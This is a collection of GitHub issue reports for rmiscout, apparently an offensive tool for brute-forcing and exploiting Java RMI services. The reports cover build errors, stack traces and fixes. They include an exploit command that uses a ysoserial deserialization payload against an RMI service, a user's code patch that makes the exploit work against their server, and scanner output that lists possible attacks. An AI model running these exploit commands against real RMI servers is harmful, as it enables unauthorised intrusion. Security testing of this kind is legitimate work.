    Plugin [id: 'com.github.johnrengelman.shadow', version: '2.0.4'] was not found in any of the following sources:

  • Gradle Core Plugins (plugin is not in 'org.gradle' namespace)
  • Plugin Repositories (could not resolve plugin artifact 'com.github.johnrengelman.shadow:com.github.johnrengelman.shadow.gradle.plugin:2.0.4')
    Searched in the following repositories:
    Gradle Central Plugin Repository
  • Try:
    Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights.

  • Get more help at https://help.gradle.org

Deprecated Gradle features were used in this build, making it incompatible with Gradle 5.0.
Use '--warning-mode all' to show the individual deprecation warnings.
See https://docs.gradle.org/4.10.3/userguide/command_line_interface.html#sec:command_line_warnings

BUILD FAILED in 0s

No workey

It's not working. Need some updating DDDAAAANNNNNNN

Errors when trying out the demo

Hi, I've just downloaded your project and get errors when trying out the demo. When launching the docker image, I get the following output:

$ sudo ./start_demo.sh 
Sending build context to Docker daemon  39.42kB
Step 1/7 : FROM openjdk:8
 ---> 08121337b7a4
Step 2/7 : COPY . /demo/
 ---> Using cache
 ---> cf5a149f4afa
Step 3/7 : WORKDIR /demo/
 ---> Using cache
 ---> 32a252e1431d
Step 4/7 : RUN chmod +x run.sh
 ---> Using cache
 ---> 4726b9e20b05
Step 5/7 : RUN javac com/bishopfox/example/*.java
 ---> Using cache
 ---> 7a9380ddf249
Step 6/7 : RUN rmic -d . com.bishopfox.example.ActivationImpl &&     rmic -d . -iiop com.bishopfox.example.CorbaImpl &&     rmic -d . com.bishopfox.example.SSLServer
 ---> Using cache
 ---> 11b2c341ba51
Step 7/7 : ENTRYPOINT ["./run.sh"]
 ---> Using cache
 ---> c786833d4889
Successfully built c786833d4889
Successfully tagged rmiscout-demo:latest
java.lang.Exception: Stack trace
	at java.lang.Thread.dumpStack(Thread.java:1336)
	at sun.rmi.server.Activation$ActivationSystemImpl.registerGroup(Activation.java:538)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:357)
	at sun.rmi.transport.Transport$1.run(Transport.java:200)
	at sun.rmi.transport.Transport$1.run(Transport.java:197)
	at java.security.AccessController.doPrivileged(Native Method)
	at sun.rmi.transport.Transport.serviceCall(Transport.java:196)
	at sun.rmi.transport.tcp.TCPTransport.handleMessages(TCPTransport.java:573)
	at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(TCPTransport.java:834)
	at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.lambda$run$0(TCPTransport.java:688)
	at java.security.AccessController.doPrivileged(Native Method)
	at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(TCPTransport.java:687)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
Got the stub for HelloInterface
ActivationServer ready on port 1099...
Plain Server ready on port 1099...
RMI-IIOP Server ready on port 1050...
SSL Server ready on port 1100...

The stack trace looks scary but the servers are up and I can scan them with nmap.

When I then try to use rmiscout to connect to port 1099, I get this:

$ ./rmiscout.sh wordlist -i demo/wordlist.txt -n ActivationServer 127.0.0.1 1099
java.lang.ClassNotFoundException: com.sun.corba.se.spi.logging.LogWrapperBase
	at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:581)
	at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:178)
	at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522)
	at java.base/java.lang.Class.forName0(Native Method)
	at java.base/java.lang.Class.forName(Class.java:315)
	at com.bishopfox.rmiscout.RMIScout.disableAccessWarnings(RMIScout.java:75)
	at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:170)
[INFO] Attempting operation on the "ActivationServer" registry.
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by javassist.ClassPool (file:/home/rmiscout/build/libs/rmiscout-1.4-SNAPSHOT-all.jar) to method java.lang.ClassLoader.defineClass(java.lang.String,byte[],int,int)
WARNING: Please consider reporting this to the maintainers of javassist.ClassPool
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
[INFO] Skipping, void args: String restart()

A similar thing happens with the registry 'plaintest'. Listing of the registries works even though the same error gets shown:

$ ./rmiscout.sh list 127.0.0.1 1099
java.lang.ClassNotFoundException: com.sun.corba.se.spi.logging.LogWrapperBase
	at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:581)
	at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:178)
	at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522)
	at java.base/java.lang.Class.forName0(Native Method)
	at java.base/java.lang.Class.forName(Class.java:315)
	at com.bishopfox.rmiscout.RMIScout.disableAccessWarnings(RMIScout.java:75)
	at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:170)
[INFO] Registries available on 127.0.0.1:1099 = [
	name[0] = ActivationServer
		class = com.bishopfox.example.ActivationImpl_Stub
	name[1] = plaintest
		class = com.bishopfox.example.HelloInterface

My JAVA_HOME is /opt/jdk1.8.0_301 and the build of rmiscout was successful. What could be the issue?

Loads of thanks for your help!

javassist.CannotCompileException: [source error] syntax error near " android.os.IBinder "

Hi,
I'm having the following error reported regardless of the option that is selected.

The command that created the error on this case was

rmiscout bruteforce -i lists/prototypes.txt -r void,boolean,long -p String,int -l 1,4 host 1099

Generating Permutations for [void] type...
Finished generating and querying 76500 Permutations

[ERROR] Did you forget to remove the interface name from the method name?

Full Stacktrace:

javassist.CannotCompileException: [source error] syntax error near " android.os.IBinder "
at javassist.CtNewMethod.make(CtNewMethod.java:79)
at javassist.CtNewMethod.make(CtNewMethod.java:45)
at com.bishopfox.rmiscout.RMIConnector.generateStubs(RMIConnector.java:197)
at com.bishopfox.rmiscout.RMIConnector.<init>(RMIConnector.java:124)
at com.bishopfox.rmiscout.RMIScout.process(RMIScout.java:198)
at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:158)
Caused by: compile error: syntax error near " android.os.IBinder "
at javassist.compiler.Parser.parseField(Parser.java:91)
at javassist.compiler.Parser.parseMember1(Parser.java:67)
at javassist.compiler.Javac.compile(Javac.java:90)
at javassist.CtNewMethod.make(CtNewMethod.java:74)
... 5 more

Is RMIConnector process logic get mistake?

environment: jdk8u202
running command: exploit -s "void hello(com.PersonDTO personDTO)" -p ysoserial.payloads.URLDNS -c "http://xxx.xxx.xxx" -n myRmiService 127.0.0.1 1099

And I get an error:

java.lang.IllegalArgumentException: Can not set java.rmi.server.RemoteRef field java.rmi.server.RemoteObject.ref to com.sun.proxy.$Proxy0
	at sun.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:167)
	at sun.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:171)
	at sun.reflect.UnsafeFieldAccessorImpl.ensureObj(UnsafeFieldAccessorImpl.java:58)
	at sun.reflect.UnsafeObjectFieldAccessorImpl.get(UnsafeObjectFieldAccessorImpl.java:36)
	at java.lang.reflect.Field.get(Field.java:393)
	at com.bishopfox.rmiscout.RMIConnector.execute(RMIConnector.java:363)
	at com.bishopfox.rmiscout.RMIConnector.exploit(RMIConnector.java:270)
	at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:325)

My RMI Server code is the following, very simple

import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class Main {
    public static void main(String[] args) throws Exception {
        // Start a registry on the default RMI port and bind the service under "myRmiService"
        Registry registry = LocateRegistry.createRegistry(1099);
        MyRmiService myRmiService = new MyRmiServiceImpl();
        registry.bind("myRmiService", myRmiService);
    }
}

I find out the following code when I debug the error:
RMIConnector.java

Remote stub = pair.getValue();
......
// Bypass internal call flow for custom params
RemoteRef ref = null;
if (interfaceName.endsWith("_Stub_Interface")) {
    isActivationServer = true;
    Field f = RemoteObject.class.getDeclaredField("ref");
    f.setAccessible(true);
    ref = (RemoteRef) f.get(stub);
} else {
    Field f = Proxy.class.getDeclaredField("h");
    f.setAccessible(true);
    ref = ((RemoteObjectInvocationHandler) f.get(stub)).getRef();
}

rmiscout always gets into the true block. But stub is a Proxy that implements the Remote type; it CANNOT get a ref field. That causes the error.

I think the false block is the better one to handle stub. So I changed the code in RMIConnector.java

//add a !
if (!interfaceName.endsWith("_Stub_Interface")) {
    isActivationServer = true;
    Field f = RemoteObject.class.getDeclaredField("ref");
    f.setAccessible(true);
    ref = (RemoteRef) f.get(stub);
} else {
    Field f = Proxy.class.getDeclaredField("h");
    f.setAccessible(true);
    ref = ((RemoteObjectInvocationHandler) f.get(stub)).getRef();
}

Rerunning rmiscout, it works! The RMI server is attacked successfully.
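A type-based version of the ref extraction discussed in this issue, added here as an example and not rmiscout's own code: it dispatches on the stub's actual runtime class instead of the `_Stub_Interface` name suffix, so a dynamic proxy is never sent down the RemoteObject branch, and it uses the public `getRef()` accessor instead of reflecting on the private field. The `StubRefExtractor` class and the `Ping` interface are assumptions made for the demo.

```java
import java.lang.reflect.Proxy;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.server.RemoteObject;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.rmi.server.RemoteRef;
import java.rmi.server.UnicastRemoteObject;

public final class StubRefExtractor {
    // Hypothetical remote interface, used only to export a dynamic-proxy stub locally.
    public interface Ping extends Remote {
        String ping() throws RemoteException;
    }

    /** Obtains the RemoteRef behind a stub from its runtime shape, not from the interface name. */
    public static RemoteRef extractRef(Remote stub) {
        if (stub instanceof RemoteObject) {
            // rmic-generated and activation stubs extend RemoteObject; its public getRef()
            // returns the same 'ref' field the issue reads via reflection, with no setAccessible.
            return ((RemoteObject) stub).getRef();
        }
        if (Proxy.isProxyClass(stub.getClass())) {
            // Dynamic-proxy stubs (the usual case since Java 5) delegate to a
            // RemoteObjectInvocationHandler, which itself extends RemoteObject.
            Object h = Proxy.getInvocationHandler(stub);
            if (h instanceof RemoteObjectInvocationHandler) {
                return ((RemoteObjectInvocationHandler) h).getRef();
            }
            throw new IllegalStateException("unexpected handler " + h.getClass().getName());
        }
        throw new IllegalStateException("unsupported stub " + stub.getClass().getName());
    }

    public static void main(String[] args) throws Exception {
        // Case 1: a registry stub is a RegistryImpl_Stub (a RemoteObject). getRegistry()
        // only builds the stub locally and contacts nothing, so this runs offline.
        Remote registryStub = LocateRegistry.getRegistry("127.0.0.1", 1099);
        System.out.println(registryStub.getClass().getName() + " -> " + extractRef(registryStub));

        // Case 2: exporting an object with no pregenerated *_Stub class yields a dynamic proxy.
        Ping impl = new Ping() { public String ping() { return "pong"; } };
        Remote proxyStub = UnicastRemoteObject.exportObject(impl, 0);
        System.out.println(proxyStub.getClass().getName() + " -> " + extractRef(proxyStub));
        UnicastRemoteObject.unexportObject(impl, true); // release the port so the JVM exits
    }
}
```

Because neither branch calls setAccessible, this also runs unchanged on JDK 16+, where reflective access to the private `ref` field would need `--add-opens java.rmi/java.rmi.server=ALL-UNNAMED`.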

[ERROR] RMI Activation Server detected. Re-run with --activation-server

Hi, whilst trying to run the latest release I'm constantly receiving the following error

[ERROR] RMI Activation Server detected. Re-run with --activation-server

[ rmiscout]# rmiscout wordlist -i lists/prototypes.txt server port --activation-server
[INFO] No registry specified. Attempting operation on all available registries...
[ERROR] RMI Activation Server detected. Re-run with --activation-server

Barmie will detect the endpoints:

RMI Registry at server:port
Objects exposed: 3
Object 1
  Name: ABCD/7676/jmxrmi
  Endpoint: server:port1
  Classes: 3
    Class 1
      Classname: javax.management.remote.rmi.RMIServerImpl_Stub
    Class 2
      Classname: java.rmi.server.RemoteStub
    Class 3
      Classname: java.rmi.server.RemoteObject
Object 2
  Name: management/rmi-jmx-connector
  Endpoint: server:port2
  Classes: 3
    Class 4
      Classname: javax.management.remote.rmi.RMIServerImpl_Stub
    Class 5
      Classname: java.rmi.server.RemoteStub
    Class 6
      Classname: java.rmi.server.RemoteObject
Object 3
  Name: jmxrmi
  Endpoint: server:port3
  Classes: 3
    Class 7
      Classname: javax.management.remote.rmi.RMIServerImpl_Stub
    Class 8
      Classname: java.rmi.server.RemoteStub
    Class 9
      Classname: java.rmi.server.RemoteObject

2 potential attacks identified (+++ = more reliable)
[--+] JMX Deserialization
[---] Java RMI registry illegal bind deserialization

0 deserialization gadgets found on leaked CLASSPATH
[~] Gadgets may still be present despite CLASSPATH not being leaked

Successfully scanned 1 target(s) for objects exposed via RMI.

java.lang.ClassNotFoundException: com.sun.corba.se.spi.logging.LogWrapperBase

Bug: ClassNotFoundException always printed

$ java -jar rmiscout-1.4-SNAPSHOT-all.jar -h
java.lang.ClassNotFoundException: com.sun.corba.se.spi.logging.LogWrapperBase
        at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:581)
        at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:178)
        at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522)
        at java.base/java.lang.Class.forName0(Native Method)
        at java.base/java.lang.Class.forName(Class.java:315)
        at com.bishopfox.rmiscout.RMIScout.disableAccessWarnings(RMIScout.java:75)
        at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:170)
usage: rmiscout [-h] MODE ...

Bruteforce and exploit RMI interfaces

named arguments:
  -h, --help             show this help message and exit

Modes of operation:
  MODE
    wordlist             Dictionary attack on RMI interfaces using a prototype wordlist
    bruteforce           Bruteforce attack on RMI interfaces
    exploit              Exploit RMI methods using type-mismatch deserialization attack
    probe                Use GadgetProbe  to  enumerate  classes  available  on  the remote
                         classpath
    invoke               Invoke methods using primitives or Strings
    list                 List available registry names

It seems any time that the rmiscout jar is run, the above stack trace about LogWrapperBase is printed. It seems as if the jar is working fine other than printing the error, but this is also the first time I am attempting to use it so I'm not sure if any functionality is affected.

I do have a server with an RMI port open according to nmap

...
41428/tcp open  java-rmi       Java RMI
...

However when running java -jar rmiscout-1.4-SNAPSHOT-all.jar list TARGET_IP 41428, the tool reports the following:

-- (LogWrapperBase exception snipped out) --
Server is offline or does not use RMI, RMI-SSL, or RMI-IIOP

Because of the exception, and the fact that nmap reports the port as an RMI service, I am worried that rmiscout is not working properly.

This jar file was directly downloaded from the repository releases page, v1.4 specifically.
https://github.com/BishopFox/rmiscout/releases/tag/v1.4

Java version:

$ java --version
openjdk 11.0.7-ea 2020-04-14
OpenJDK Runtime Environment (build 11.0.7-ea+9-post-Debian-1)
OpenJDK 64-Bit Server VM (build 11.0.7-ea+9-post-Debian-1, mixed mode, sharing)

I am running Kali Linux if that matters for some reason.

$ uname -a
Linux hostname 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64 GNU/Linux

Gradle build fails on ysoserial dependency

Description of Bug

When attempting to build the Jar using Gradle, it fails with the error Could not find com.github.frohoff:ysoserial:master-SNAPSHOT.

What should the expected behavior be

All dependencies resolve properly so that the project build can successfully finish.

Steps to Reproduce

Run gradlew script to build the project

$ ./gradlew -Dorg.gradle.java.home=/usr/lib/jvm/java-8-openjdk-amd64 shadowJar
Starting a Gradle Daemon, 1 incompatible Daemon could not be reused, use --status for details

FAILURE: Build failed with an exception.

* What went wrong:
Could not determine the dependencies of task ':shadowJar'.
> Could not resolve all dependencies for configuration ':runtimeClasspath'.
   > Could not find com.github.frohoff:ysoserial:master-SNAPSHOT.
     Searched in the following locations:
       - https://repo.maven.apache.org/maven2/com/github/frohoff/ysoserial/master-SNAPSHOT/maven-metadata.xml
       - https://repo.maven.apache.org/maven2/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.pom
       - https://repo.maven.apache.org/maven2/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
       - https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/maven-metadata.xml
       - https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-2874a69f61-1.pom
       - https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-2874a69f61-1.jar
       - https://repo.spring.io/plugins-release/com/github/frohoff/ysoserial/master-SNAPSHOT/maven-metadata.xml
       - https://repo.spring.io/plugins-release/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.pom
       - https://repo.spring.io/plugins-release/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
       - https://repo.jenkins-ci.org/public/com/github/frohoff/ysoserial/master-SNAPSHOT/maven-metadata.xml
       - https://repo.jenkins-ci.org/public/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.pom
       - https://repo.jenkins-ci.org/public/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
     Required by:
         project :

* Try:
Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights.

* Get more help at https://help.gradle.org

BUILD FAILED in 8s

Additional context

$ /usr/lib/jvm/java-8-openjdk-amd64/bin/java -version
openjdk version "1.8.0_342"
OpenJDK Runtime Environment (build 1.8.0_342-8u342-b07-0ubuntu1~20.04-b07)
OpenJDK 64-Bit Server VM (build 25.342-b07, mixed mode)
